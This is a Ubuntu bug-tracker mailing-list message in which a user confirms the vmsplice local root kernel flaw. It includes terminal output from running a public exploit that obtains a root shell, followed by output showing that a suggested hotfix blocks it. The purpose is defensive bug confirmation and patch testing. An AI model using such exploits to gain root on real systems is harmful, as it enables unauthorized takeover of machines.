Contrary to what I've been reading, I can confirm this on feisty, at least with AMD processor:
[EMAIL PROTECTED]:~$ grep "model name" /proc/cpuinfo model name : Dual-Core AMD Opteron(tm) Processor 2218 model name : Dual-Core AMD Opteron(tm) Processor 2218 model name : Dual-Core AMD Opteron(tm) Processor 2218 model name : Dual-Core AMD Opteron(tm) Processor 2218 [EMAIL PROTECTED]:~$ uname -a Linux pie 2.6.20-16-generic #2 SMP Thu Jan 31 22:39:18 UTC 2008 x86_64 GNU/Linux [EMAIL PROTECTED]:~$ ./exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x100000000000 .. 0x100000001000 [+] page: 0x100000000000 [+] page: 0x100000000038 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4038 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0x2ac0a9f0d000 .. 0x2ac0a9f3f000 [+] root [EMAIL PROTECTED]:~# whoami root [EMAIL PROTECTED]:~# I also confirm the suggested hotfix (disable-vmsplice-if-exploitable.c) works: [EMAIL PROTECTED]:~$ cc disable-vmsplice-if-exploitable.c [EMAIL PROTECTED]:~$ ./a.out ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x100000000000 .. 0x100000001000 [+] page: 0x100000000000 [+] page: 0x100000000038 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4038 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0x2acad5163000 .. 0x2acad5195000 [+] root Exploit gone! [EMAIL PROTECTED]:~$ ./exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x100000000000 .. 0x100000001000 [+] page: 0x100000000000 [+] page: 0x100000000038 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4038 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0x2b010025b000 .. 0x2b010028d000 [-] vmsplice [EMAIL PROTECTED]:~$ whoami ycsapo -- Local root exploit in kernel 2.6.17 - 2.6.24 (vmsplice) https://bugs.launchpad.net/bugs/190587 You received this bug notification because you are a member of Ubuntu Bugs, which is the bug contact for Ubuntu. -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs